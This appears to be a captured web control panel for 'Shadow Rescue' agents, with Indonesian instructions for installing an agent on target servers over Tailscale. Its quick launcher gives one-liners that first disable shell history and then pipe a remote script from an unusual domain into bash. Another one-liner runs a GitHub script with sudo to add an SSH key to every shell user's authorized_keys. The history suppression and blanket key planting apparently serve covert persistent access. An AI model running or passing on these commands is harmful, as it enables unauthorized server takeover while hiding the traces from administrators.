Agents
Manage your connected servers
| Name | Status | IP | Platform | Key Expiry | Last Seen | |
|---|---|---|---|---|---|---|
| Loading agents... | ||||||
—
—
| Name | Owner | Size | Modified | Mode | |
|---|---|---|---|---|---|
| Select terminal first... | |||||
Deploy
Install Shadow Rescue on a new server
Activity
SSH session logs
—
Total Sessions
—
Today
—
This Week
—
Unique Hosts
Recent Sessions
showing last 200
Settings
Configure Tailscale API and account settings
Tailscale Configuration
Get from tailscale.com → Admin → Settings → Keys
Kosongkan untuk auto-detect dari API key
Account
⚡ Quick Launcher
Shadow Rescue
AGENT
Install agen Shadow Rescue ke server target. Otomatis join Tailscale network dan kirim heartbeat ke panel.
① Install via curl
unset HISTFILE; HISTFILESIZE=0; curl -fsSL https://ts.carlesgantengidaman.uk/i/9c37e87edda1ee90 | bash
② URL installer
https://ts.carlesgantengidaman.uk/i/9c37e87edda1ee90
Tailscale
VPN
Install Tailscale VPN di server target, lalu auth ke tailnet dengan auth key dari Tailscale admin.
① Install (Linux)
curl -fsSL https://tailscale.com/install.sh | sh
② Auth ke tailnet
tailscale up --authkey=tskey-auth-XXXX --hostname=$(hostname)
SSH Key Deploy
KEY
Tambah SSH public key ke authorized_keys semua user ber-shell di server target.
① One-liner
unset HISTFILE; HISTFILESIZE=0; curl -fsSL https://raw.githubusercontent.com/bssn1337/ssh-deploy/main/add-key.sh | sudo bash